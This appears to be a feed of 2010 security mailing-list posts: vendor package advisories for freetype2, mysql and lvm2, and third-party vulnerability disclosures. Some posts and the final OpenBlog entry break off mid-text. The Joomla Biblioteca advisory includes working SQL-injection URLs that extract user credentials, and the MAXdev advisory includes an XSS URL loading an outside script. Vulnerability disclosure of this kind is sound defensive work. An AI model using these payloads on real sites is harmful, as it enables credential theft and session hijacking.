[ MDVSA-2010:156 ] freetype2

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:156
 http://www.mandriva.com/security/
 ___

 Package : freetype2
 Date: August 22, 2010
 Affected: 2008.0, 2009.0, 2009.1, Corporate 4.0, Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities has been found and corrected in freetype2:
 
 The FT_Stream_EnterFrame function in base/ftstream.c in FreeType
 before 2.4.2 does not properly validate certain position values, which
 allows remote attackers to cause a denial of service (application
 crash) or possibly execute arbitrary code via a crafted font file
 (CVE-2010-2805).
 
 Array index error in the t42_parse_sfnts function in type42/t42parse.c
 in FreeType before 2.4.2 allows remote attackers to cause a denial of
 service (application crash) or possibly execute arbitrary code via
 negative size values for certain strings in FontType42 font files,
 leading to a heap-based buffer overflow (CVE-2010-2806).
 
 FreeType before 2.4.2 uses incorrect integer data types during bounds
 checking, which allows remote attackers to cause a denial of service
 (application crash) or possibly execute arbitrary code via a crafted
 font file (CVE-2010-2807).
 
 Buffer overflow in the Mac_Read_POST_Resource function in base/ftobjs.c
 in FreeType before 2.4.2 allows remote attackers to cause a denial of
 service (memory corruption and application crash) or possibly execute
 arbitrary code via a crafted Adobe Type 1 Mac Font File (aka LWFN)
 font (CVE-2010-2808).
 
 bdf/bdflib.c in FreeType before 2.4.2 allows remote attackers to cause
 a denial of service (application crash) via a crafted BDF font file,
 related to an attempted modification of a value in a static string
 (CVE-2010-3053).
 
 Unspecified vulnerability in FreeType 2.3.9, and other versions
 before 2.4.2, allows remote attackers to cause a denial of service
 via vectors involving nested Standard Encoding Accented Character
 (aka seac) calls, related to psaux.h, cffgload.c, cffgload.h, and
 t1decode.c (CVE-2010-3054).
 
 Packages for 2008.0 and 2009.0 are provided as of the Extended
 Maintenance Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2805
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2806
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2807
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3053
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3054
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 b8ab28fadc221eeae0ea9d9d14648be6  
2008.0/i586/libfreetype6-2.3.5-2.5mdv2008.0.i586.rpm
 b1341c5c0f0ed584ce12b5076af1bfa0  
2008.0/i586/libfreetype6-devel-2.3.5-2.5mdv2008.0.i586.rpm
 b806a4715130d102ea43695fe943cadf  
2008.0/i586/libfreetype6-static-devel-2.3.5-2.5mdv2008.0.i586.rpm 
 d56c81e34ba5a646112cf7f54d1b6770  
2008.0/SRPMS/freetype2-2.3.5-2.5mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 537b00290a2d20e10bfd103a01bfbcbe  
2008.0/x86_64/lib64freetype6-2.3.5-2.5mdv2008.0.x86_64.rpm
 28178fd2d4c12cb0806f29a283b56e60  
2008.0/x86_64/lib64freetype6-devel-2.3.5-2.5mdv2008.0.x86_64.rpm
 fccebfb3e2bc0f752ef37700107db924  
2008.0/x86_64/lib64freetype6-static-devel-2.3.5-2.5mdv2008.0.x86_64.rpm 
 d56c81e34ba5a646112cf7f54d1b6770  
2008.0/SRPMS/freetype2-2.3.5-2.5mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 9c93eb065e0fb99af3c7f8e23d323ff6  
2009.0/i586/libfreetype6-2.3.7-1.4mdv2009.0.i586.rpm
 9d18899bdac168770c4d44b1e1610107  
2009.0/i586/libfreetype6-devel-2.3.7-1.4mdv2009.0.i586.rpm
 1865120e616ce57a9d8a3a91980456d3  
2009.0/i586/libfreetype6-static-devel-2.3.7-1.4mdv2009.0.i586.rpm 
 45197fd09ebbc0dd4b7f704843568d7a  
2009.0/SRPMS/freetype2-2.3.7-1.4mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 daf8318e7b97d0781fa8403145d09d8b  
2009.0/x86_64/lib64freetype6-2.3.7-1.4mdv2009.0.x86_64.rpm
 5cbfff99d66a0133a52a438a7aaeea20  
2009.0/x86_64/lib64freetype6-devel-2.3.7-1.4mdv2009.0.x86_64.rpm
 8aa86b0aba83c69d7ea2f6cef14ea420  
2009.0/x86_64/lib64freetype6-static-devel-2.3.7-1.4mdv2009.0.x86_64.rpm 
 45197fd09ebbc0dd4b7f704843568d7a  
2009.0/SRPMS/freetype2-2.3.7-1.4mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 d5a7a6e2f6ed6b27be3b4c65cf8db53f  
2009.1/i586/libfreetype6-2.3.9-1.5mdv2009.1.i586.rpm
 40a0a8d44bfe4ec11f3e997ed9edb223  
2009.1/i586/libfreetype6-devel-2.3.9-1.5mdv2009.1.i586.rpm
 02597999b4a298ab1ab3d899c56e3931  
2009.1/i586/libfreetype6-static-devel-2.3.9-1.5mdv2009.1.i586.rpm 

Secunia Research: Mono libgdiplus Image Processing Three Integer Overflows

[Secunia Research]

== 

 Secunia Research 23/08/2010

 - Mono libgdiplus Image Processing Three Integer Overflows -

== 
Table of Contents

Affected Software1
Severity.2
Vendor's Description of Software.3
Description of Vulnerability.4
Solution.5
Time Table...6
Credits..7
References...8
About Secunia9
Verification10

== 
1) Affected Software 

* libgdiplus 2.6.7

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Moderately critical
Impact: System access
Where:  Remote

== 
3) Vendor's Description of Software 

"Libgdiplus is the Mono library that provide a GDI+ comptible API on
non-Windows operating systems".

Product Link:
http://www.mono-project.com/Libgdiplus

== 
4) Description of Vulnerability

Secunia Research has discovered three vulnerabilities in libgdiplus 
for Mono, which can be exploited by malicious people to compromise an
application using the library.

1) An integer overflow error within the "gdip_load_tiff_image()" 
function in src/tiffcodec.c can be exploited to cause a heap-based 
buffer overflow by e.g. processing specially crafted TIFF images in 
an application using the library.

2) An integer overflow error within the 
"gdip_load_jpeg_image_internal()" function in src/jpegcodec.c can be 
exploited to cause a heap-based buffer overflow by e.g. processing 
specially crafted JPEG images in an application using the library.

3) An integer overflow error within the "gdip_read_bmp_image()"
function in src/bmpcodec.c can be exploited to cause a heap-based 
buffer overflow by e.g. processing specially crafted BMP images in an 
application using the library.

== 
5) Solution 

Do not process untrusted images in an application using the library.

== 
6) Time Table 

12/08/2010 - Vendor notified.
12/08/2010 - Vendor response.
19/08/2010 - Accidental public disclosure by an involved party. 
23/08/2010 - Public disclosure.

== 
7) Credits 

Discovered by Stefan Cornelius, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2010-1526 for the vulnerabilities.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-102/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==

Re: 2Wire Broadband Router Session Hijacking Vulnerability

[YGN Ethical Hacker Group]

2wire support just replied that this has been fixed and new version
(6.x.x.x) has been released.

The advisory has been updated accordingly.

http://yehg.net/lab/pr0js/advisories/2wire/[2wire]_session_hijacking_vulnerability

Google Chrome: HTTP AUTH Dialog Spoofing through Realm Manipulation (Restated)

[Aditya K Sood]

Hi

Google Chrome ( 5.0.375.127 and previous versions) suffers from HTTP
Auth Dialog spoofing vulnerability due to possible
realm manipulation in the HTTP header. Previously, Google chrome has got
a similar bug which can be seen on the following link

http://code.google.com/p/chromium/issues/detail?id=36772

This bug was actually patched. The issue mentioned in this bug was
dialog spoofing due to long sub domain names. The patch worked
only for that specific case which was outlined in that bug. There are
number of tests have been conducted on Google Chrome
which verifies the inefficiency of Google Chrome to scrutinize the type
of realm value set in the header. It can be tampered with
double quotes and single quotes used in a definite manner.

As mentioned in RFC 2617

/"The realm directive (case-insensitive) is required for all
authentication schemes that issue a challenge.
The realm value (case-sensitive), in combination with the canonical root
URL (the absolute URI for the
server whose abs_path is empty;
of the server
being accessed, defines the protection space. These realms allow
the protected resources on a server to be partitioned into a set of
protection spaces, each with its own authentication
scheme and/or authorization database.//The realm value is a string,
generally assigned by the origin server, which
may have additional semantics specific to the authentication scheme.
Note that there may be multiple challenges
with the same auth-scheme but different realm/s./"

/So, realm value plays critical role in determining the framework of
HTTP Access authentication for a particular resource. It
has been analyzed that it is possible to spoof the HTTP Auth dialog by
playing around realm values. This attack scenario
can be used to launch phishing attacks and stealing sensitive
information from the legitimate websites.

As it has been released before, Google Chrome fails to sanitize the
obfuscated URL and redirect it to the different domain.
This potential flaw can be combined with the HTTP Auth dialog spoofing
to launch attacks against legitimate websites.

An appropriate POC video has been released on the below mentioned links

http://www.youtube.com/watch?v=r1KuE2th_EY
http://secniche.org/videos/goog_http_auth_realm_mani.html

(Note: A comparative test against Firefox has been placed in the video
itself)


Kind Regards
Aditya K Sood
http://www.secniche.org

[ MDVSA-2010:157 ] freetype2

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:157
 http://www.mandriva.com/security/
 ___

 Package : freetype2
 Date: August 22, 2010
 Affected: 2010.0, 2010.1
 ___

 Problem Description:

 Multiple vulnerabilities has been found and corrected in freetype2:
 
 The FT_Stream_EnterFrame function in base/ftstream.c in FreeType
 before 2.4.2 does not properly validate certain position values, which
 allows remote attackers to cause a denial of service (application
 crash) or possibly execute arbitrary code via a crafted font file
 (CVE-2010-2805).
 
 Array index error in the t42_parse_sfnts function in type42/t42parse.c
 in FreeType before 2.4.2 allows remote attackers to cause a denial of
 service (application crash) or possibly execute arbitrary code via
 negative size values for certain strings in FontType42 font files,
 leading to a heap-based buffer overflow (CVE-2010-2806).
 
 FreeType before 2.4.2 uses incorrect integer data types during bounds
 checking, which allows remote attackers to cause a denial of service
 (application crash) or possibly execute arbitrary code via a crafted
 font file (CVE-2010-2807).
 
 Buffer overflow in the Mac_Read_POST_Resource function in base/ftobjs.c
 in FreeType before 2.4.2 allows remote attackers to cause a denial of
 service (memory corruption and application crash) or possibly execute
 arbitrary code via a crafted Adobe Type 1 Mac Font File (aka LWFN)
 font (CVE-2010-2808).
 
 bdf/bdflib.c in FreeType before 2.4.2 allows remote attackers to cause
 a denial of service (application crash) via a crafted BDF font file,
 related to an attempted modification of a value in a static string
 (CVE-2010-3053).
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2805
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2806
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2807
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3053
 ___

 Updated Packages:

 Mandriva Linux 2010.0:
 d959258ea6f44aab3c0befc77a4ff7ab  
2010.0/i586/libfreetype6-2.3.11-1.3mdv2010.0.i586.rpm
 74e1516ba39f185df9aed7f75782c2fa  
2010.0/i586/libfreetype6-devel-2.3.11-1.3mdv2010.0.i586.rpm
 30fb284e1517aac5d07860753cebdedd  
2010.0/i586/libfreetype6-static-devel-2.3.11-1.3mdv2010.0.i586.rpm 
 9f60d2840d038d2d007a77f297173200  
2010.0/SRPMS/freetype2-2.3.11-1.3mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 da064231c9ed02c49b2341c86bc5460d  
2010.0/x86_64/lib64freetype6-2.3.11-1.3mdv2010.0.x86_64.rpm
 5509100ccdc3a9db75893d2c70cfec70  
2010.0/x86_64/lib64freetype6-devel-2.3.11-1.3mdv2010.0.x86_64.rpm
 e2a55e6fb6a35fa6d331bd9543df7290  
2010.0/x86_64/lib64freetype6-static-devel-2.3.11-1.3mdv2010.0.x86_64.rpm 
 9f60d2840d038d2d007a77f297173200  
2010.0/SRPMS/freetype2-2.3.11-1.3mdv2010.0.src.rpm

 Mandriva Linux 2010.1:
 8b28c1a459c20045a8e735554fe4407d  
2010.1/i586/libfreetype6-2.3.12-1.3mdv2010.1.i586.rpm
 32fd702b42acfd0a7011770b36fdcc74  
2010.1/i586/libfreetype6-devel-2.3.12-1.3mdv2010.1.i586.rpm
 7b3575d46c7c607387fe317fb78c5a6f  
2010.1/i586/libfreetype6-static-devel-2.3.12-1.3mdv2010.1.i586.rpm 
 9a75ac1b698c9d4145fdcd1448ef30eb  
2010.1/SRPMS/freetype2-2.3.12-1.3mdv2010.1.src.rpm

 Mandriva Linux 2010.1/X86_64:
 e2ebda52f9c6e2354b2184c038e3b1f6  
2010.1/x86_64/lib64freetype6-2.3.12-1.3mdv2010.1.x86_64.rpm
 227ce37797e79135d41f12771377112d  
2010.1/x86_64/lib64freetype6-devel-2.3.12-1.3mdv2010.1.x86_64.rpm
 0915a373ebf7e210997e9ba3614b4c5f  
2010.1/x86_64/lib64freetype6-static-devel-2.3.12-1.3mdv2010.1.x86_64.rpm 
 9a75ac1b698c9d4145fdcd1448ef30eb  
2010.1/SRPMS/freetype2-2.3.12-1.3mdv2010.1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFMcTYEmqjQ0CJFipgRAt46AJ98JG7/1G1OFwBPz9yWXC289QahBQ

[SECURITY] [DSA 2095-1] New lvm2 packages fix denial of service

[Giuseppe Iuculano]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-2095-1  secur...@debian.org
http://www.debian.org/security/Giuseppe Iuculano
August 23, 2010   http://www.debian.org/security/faq
- 

Package: lvm2
Vulnerability  : insecure communication protocol
Problem type   : local
Debian-specific: no
CVE Id : CVE-2010-2526
Debian Bug : 591204


Alasdair Kergon discovered that the cluster logical volume manager daemon
(clvmd) in lvm2, The Linux Logical Volume Manager, does not verify client
credentials upon a socket connection, which allows local users to cause a
denial of service.

For the stable distribution (lenny), this problem has been fixed in
version 2.02.39-8

For the testing distribution (squeeze), and the unstable distribution (sid),
this problem has been fixed in version 2.02.66-3


We recommend that you upgrade your lvm2 package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- 

Debian (stable)
- ---

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/l/lvm2/lvm2_2.02.39-8.diff.gz
Size/MD5 checksum:17393 fb9151fdf32540e15eb245389d9d5903
  http://security.debian.org/pool/updates/main/l/lvm2/lvm2_2.02.39.orig.tar.gz
Size/MD5 checksum:   594342 1450ae55a89ea98e4ea51ad7f4ba22d4
  http://security.debian.org/pool/updates/main/l/lvm2/lvm2_2.02.39-8.dsc
Size/MD5 checksum: 1132 a0c84982012567f3ca824e7bdeae7637

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/l/lvm2/clvm_2.02.39-8_alpha.deb
Size/MD5 checksum:   256566 c326b8e851c0f32cbe8691b01cc11984
  http://security.debian.org/pool/updates/main/l/lvm2/lvm2_2.02.39-8_alpha.deb
Size/MD5 checksum:   384348 8d1385a4f8337c5526f3304c6fec1f51
  
http://security.debian.org/pool/updates/main/l/lvm2/lvm2-udeb_2.02.39-8_alpha.udeb
Size/MD5 checksum:   245390 e462d169578ba15401c90dd77760b38d

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/l/lvm2/lvm2-udeb_2.02.39-8_amd64.udeb
Size/MD5 checksum:   225468 8c8e5331e9ddb80e616ae52e766007fd
  http://security.debian.org/pool/updates/main/l/lvm2/clvm_2.02.39-8_amd64.deb
Size/MD5 checksum:   237884 a0125354fa125136d2f9ec3de006cdc2
  http://security.debian.org/pool/updates/main/l/lvm2/lvm2_2.02.39-8_amd64.deb
Size/MD5 checksum:   365790 dcc943057cd272357b6650f1eefac73a

armel architecture (ARM EABI)

  
http://security.debian.org/pool/updates/main/l/lvm2/lvm2-udeb_2.02.39-8_armel.udeb
Size/MD5 checksum:   234540 b88dd34c0908a28233d5eadd04f85efa
  http://security.debian.org/pool/updates/main/l/lvm2/lvm2_2.02.39-8_armel.deb
Size/MD5 checksum:   366242 4c76f36b042cf9623f0083bb805133f6
  http://security.debian.org/pool/updates/main/l/lvm2/clvm_2.02.39-8_armel.deb
Size/MD5 checksum:   237448 c8da5e5304588fc15c99b544f04e146c

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/l/lvm2/lvm2_2.02.39-8_hppa.deb
Size/MD5 checksum:   392908 6b16252cf68e7059f1e30a9e476f94e8
  http://security.debian.org/pool/updates/main/l/lvm2/clvm_2.02.39-8_hppa.deb
Size/MD5 checksum:   260256 091ed1a82e45c00754a95caa6b0baa6f
  
http://security.debian.org/pool/updates/main/l/lvm2/lvm2-udeb_2.02.39-8_hppa.udeb
Size/MD5 checksum:   255674 2637ecd324df5ea0fc623feb19d1d306

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/l/lvm2/lvm2_2.02.39-8_i386.deb
Size/MD5 checksum:   355436 9d02ac68e55be8eef8d0ea1ce6b20b43
  http://security.debian.org/pool/updates/main/l/lvm2/clvm_2.02.39-8_i386.deb
Size/MD5 checksum:   226510 f52a7348863979ed12844154c4573c10
  
http://security.debian.org/pool/updates/main/l/lvm2/lvm2-udeb_2.02.39-8_i386.udeb
Size/MD5 checksum:   208860 df9af70565f01b89e4b2739352f78222

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/l/lvm2/lvm2-udeb_2.02.39-8_ia64.udeb
Size/MD5 checksum:   322386 5ae8fba02689e5b9a694aef1dbb13057
  http://security.debian.org/pool/updates/main/l/lvm2/lvm2_2.02.39-8_ia64.deb
Size/MD5 checksum:   480774 2c556d7af51ddab5a44b2d6e5d6b3bd7
  http://security.debian.org/pool/updates/main/l/lvm2/clvm_2.02.39-8_ia64.deb
Size/MD5 c

[ MDVSA-2010:155 ] mysql

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:155
 http://www.mandriva.com/security/
 ___

 Package : mysql
 Date: August 20, 2010
 Affected: 2010.0, 2010.1
 ___

 Problem Description:

 Multiple vulnerabilities has been found and corrected in mysql:
 
 MySQL before 5.1.48 allows remote authenticated users with alter
 database privileges to cause a denial of service (server crash
 and database loss) via an ALTER DATABASE command with a #mysql50#
 string followed by a . (dot), .. (dot dot), ../ (dot dot slash) or
 similar sequence, and an UPGRADE DATA DIRECTORY NAME command, which
 causes MySQL to move certain directories to the server data directory
 (CVE-2010-2008).
 
 Additionally many security issues noted in the 5.1.49 release notes
 has been addressed with this advisory as well, such as:
 
 * LOAD DATA INFILE did not check for SQL errors and sent an OK packet
 even when errors were already reported. Also, an assert related to
 client-server protocol checking in debug servers sometimes was raised
 when it should not have been. (Bug#52512)
 
 * Using EXPLAIN with queries of the form SELECT ... UNION ... ORDER BY
 (SELECT ... WHERE ...) could cause a server crash. (Bug#52711)
 
 * The server could crash if there were alternate reads from two
 indexes on a table using the HANDLER interface. (Bug#54007)
 
 * A malformed argument to the BINLOG statement could result in Valgrind
 warnings or a server crash. (Bug#54393)
 
 * Incorrect handling of NULL arguments could lead to a crash for IN()
 or CASE operations when NULL arguments were either passed explicitly
 as arguments (for IN()) or implicitly generated by the WITH ROLLUP
 modifier (for IN() and CASE). (Bug#54477)
 
 * Joins involving a table with with a unique SET column could cause
 a server crash. (Bug#54575)
 
 * Use of TEMPORARY  InnoDB tables with nullable columns could cause
 a server crash. (Bug#54044)
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2008
 http://bugs.mysql.com/bug.php?id=52512
 http://bugs.mysql.com/bug.php?id=52711
 http://bugs.mysql.com/bug.php?id=54007
 http://bugs.mysql.com/bug.php?id=54393
 http://bugs.mysql.com/bug.php?id=54477
 http://bugs.mysql.com/bug.php?id=54575
 http://bugs.mysql.com/bug.php?id=54044
 ___

 Updated Packages:

 Mandriva Linux 2010.0:
 e0181e6f02a4d75da4844afb468a2272  
2010.0/i586/libmysql16-5.1.42-0.6mdv2010.0.i586.rpm
 90babf8758412eedecb7eb6c9881d1a9  
2010.0/i586/libmysql-devel-5.1.42-0.6mdv2010.0.i586.rpm
 217ebcccf4b1af0701bdcf042165be12  
2010.0/i586/libmysql-static-devel-5.1.42-0.6mdv2010.0.i586.rpm
 6b1a9b256eb1d1449609a9e914f7664e  
2010.0/i586/mysql-5.1.42-0.6mdv2010.0.i586.rpm
 7add987091592e974e8ae64994c82313  
2010.0/i586/mysql-bench-5.1.42-0.6mdv2010.0.i586.rpm
 a13c5bb98abb9aba82fb80dcb27e2752  
2010.0/i586/mysql-client-5.1.42-0.6mdv2010.0.i586.rpm
 8b2847d65735c38458c77153072a281e  
2010.0/i586/mysql-common-5.1.42-0.6mdv2010.0.i586.rpm
 86567fb759318246336f7077d6c13709  
2010.0/i586/mysql-common-core-5.1.42-0.6mdv2010.0.i586.rpm
 e8a3c6e59eb5321d13ad1a863465f6ef  
2010.0/i586/mysql-core-5.1.42-0.6mdv2010.0.i586.rpm
 b54c2338358f35dfb1292d615583ea2a  
2010.0/i586/mysql-doc-5.1.42-0.6mdv2010.0.i586.rpm
 1b4987ab9f81a4c0cd8e44e2bb2433c4  
2010.0/i586/mysql-max-5.1.42-0.6mdv2010.0.i586.rpm
 38c17d5f3d550d81dc14f38b7a5dc73d  
2010.0/i586/mysql-ndb-extra-5.1.42-0.6mdv2010.0.i586.rpm
 75cde53e6cc55176915cdd510419052c  
2010.0/i586/mysql-ndb-management-5.1.42-0.6mdv2010.0.i586.rpm
 522dd59860efcf76b2ecbd598e1fbba4  
2010.0/i586/mysql-ndb-storage-5.1.42-0.6mdv2010.0.i586.rpm
 a2fbac8608bd716b13b24644fc4e28c5  
2010.0/i586/mysql-ndb-tools-5.1.42-0.6mdv2010.0.i586.rpm 
 9a02ff536f50d0dec97097d94d24c7e6  
2010.0/SRPMS/mysql-5.1.42-0.6mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 dfa125382cbe6a86a3e2747c40e80556  
2010.0/x86_64/lib64mysql16-5.1.42-0.6mdv2010.0.x86_64.rpm
 968922e7d30ad10adc07e494df043f65  
2010.0/x86_64/lib64mysql-devel-5.1.42-0.6mdv2010.0.x86_64.rpm
 6fc264fa829f9e1843bfe1fa2034b7c7  
2010.0/x86_64/lib64mysql-static-devel-5.1.42-0.6mdv2010.0.x86_64.rpm
 13b2e24a215b63f36eb530b352a67ad3  
2010.0/x86_64/mysql-5.1.42-0.6mdv2010.0.x86_64.rpm
 e32753015f97d63a4bc07e88d9823250  
2010.0/x86_64/mysql-bench-5.1.42-0.6mdv2010.0.x86_64.rpm
 c06b10d407d93365d728eacecf54ae2b  
2010.0/x86_64/mysql-client-5.1.42-0.6mdv2010.0.x86_64.rpm
 f89dc39e6cc7a5c4e567f8c92cff9c5d  
2010.0/x86_64/mysql-common-5.1.42-0.6mdv2010.0.x86_64.rpm
 8983a954ac90e6f57b3b6b93dd5a390d  
2010.0/x86_64/mysql-co

Biblioteca 1.0 Beta Joomla Component Multiple SQL Injection Vulnerabilities

[Salvatore Fresta aka Drosophila]

Biblioteca 1.0 Beta Joomla Component Multiple SQL Injection Vulnerabilities

 Name  Biblioteca
 Vendorhttp://www.cielostellato.info
 Versions Affected 1.0 Beta

 AuthorSalvatore Fresta aka Drosophila
 Website   http://www.salvatorefresta.net
 Contact   salvatorefresta [at] gmail [dot] com
 Date  2010-08-21

X. INDEX

 I.ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.FIX
 

I. ABOUT THE APPLICATION


Component  that  allows  the automatic  management  of a
library  in  electronic format. It' can manage books and
their  loans  through   an   attractive  graphical  user
interface simple and usable.


II. DESCRIPTION
___

This component doesn't use the common Joomla's functions
to  get  the parameters's value from GET, POST etc.. and
all  of  these  are  not properly sanitised before being
used in SQL queries.


III. ANALYSIS
_

Summary:

 A) Multiple Blind SQL Injection
 B) Multiple SQL Injection
 

A) Multiple Blind SQL Injection
___


The  parameter  testo  passed  to  bi.php (site and admin
frontends)  is  properly sanitised before being used in a
SQL query.This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.


B) Multiple SQL Injection
_

The  parameter testo  passed  to  stampa.php, pdf.php and 
models/biblioteca.php (when "view" is set to "biblioteca"
) is  properly sanitised before being used in SQL queries.
This  can  be  exploited to  manipulate  SQL  queries  by
injecting arbitrary SQL code.


IV. SAMPLE CODE
___

A) Multiple SQL Injection

http://host/path/components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25'
 UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23

http://host/path/components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25'
 UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23

http://host/path/index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' 
UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23


V. FIX
__

No fix.

XSS vulnerability in MAXdev

[advisory]

Vulnerability ID: HTB22563
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_maxdev.html
Product: MAXdev
Vendor: MAXdev ( http://www.maxdev.it/ ) 
Vulnerable Version: 1.0.83 and Probably Prior Versions
Vendor Notification: 05 August 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Fixed by Vendor
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "modules.php" script to properly 
sanitize user-supplied input in "sid" variable. Successful exploitation of this 
vulnerability could result in a compromise of the application, theft of 
cookie-based authentication credentials, disclosure or modification of 
sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is 
available:


http://host/modules.php?op=modload&name=News&file=article&sid=1%22%3E%3Cscript+src=http://www.htbridge.ch/advisory/1.js+a=

Solution: Upgrade to the most recent version

Re: [MajorSecurity SA-080]WordPress 3.0.1 - Cross Site Scripting Issue

[MustLive]

Hello Bugtraq!

Regarding this XSS in WordPress 3.0.1 
(http://www.securityfocus.com/archive/1/513101/30/30/threaded) I'll note 
about what I already wrote at my site last week. And already wrote to David. 
That for the attack it's needed to know token (_wpnonce), which designed to 
protect against CSRF attacks (which exists in WP 2.9.2 and previous versions 
and must be in next versions), so practically it'll be hard to use this XSS.


Note, that versions WordPress 2.0.x aren't vulnerable, because they have not 
such functionality. But, as I checked, vulnerable are versions 2.7 - 2.9.2 
(similarly as in case of versions 3.0 and 3.0.1). Also vulnerable is WP 
2.6.2, but it's needed to make attack differently in it (completely 
different request), at that only POST request is possible (at that in WP 2.7 
and higher as GET, as POST requests are possible). In WP 2.6.x this 
functionality is implemented differently.


Also I'll note, that researcher stated, that attack is going via parameter 
checked[0] in script wp-admin/plugins.php, when parameter action equal 
delete-selected. As I checked, XSS code can be set as in checked[0], as in 
checked[1] and so on, and also in checked[]. Besides in WP 2.8 - 2.9.2 (and 
possibly in 3.0 and 3.0.1) it's possible to set as action equal 
delete-selected, as action2 equal delete-selected, and in versions 2.7.х 
it's possible to use only action.


Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 

[Bkis-04-2010] Multiple Vulnerabilities in OpenBlog

[Bkis]

[Bkis-04-2010] Multiple Vulnerabilities in OpenBlog

1. General Information

OpenBlog is a free software for developing blogging platform. OpenBlog is
written on PHP language and available at http://www.open-blog.info. In
August 2010, Bkis Security discovered some XSS, CSRF vulnerabilities on this
software; especially, there is a vulnerability which might allow privilege
elevation on OpenBlog 1.2.1. Taking advantage of this vulnerability, hacker
might execute malicious code on user's browser or even get control of Blog.
Bkis has sent its warning to the developer.

Details: http://security.bkis.com/?p=1382
SVRT Advisory: Bkis-04-2010
Initial vendor notification: 08/09/2010
Release Date: 08/23/2010
Update Date: 08/23/2010
Discovered by: Duong Manh Linh, Truong Tu Hai, Nguyen Hoang Vinh - Bkis
Attack Type: Bypass Authentication, XSS, CSRF
Security Rating: High
Impact: Code Execution
Affected Software: Openblog< v1.2.1

2. Technical Details

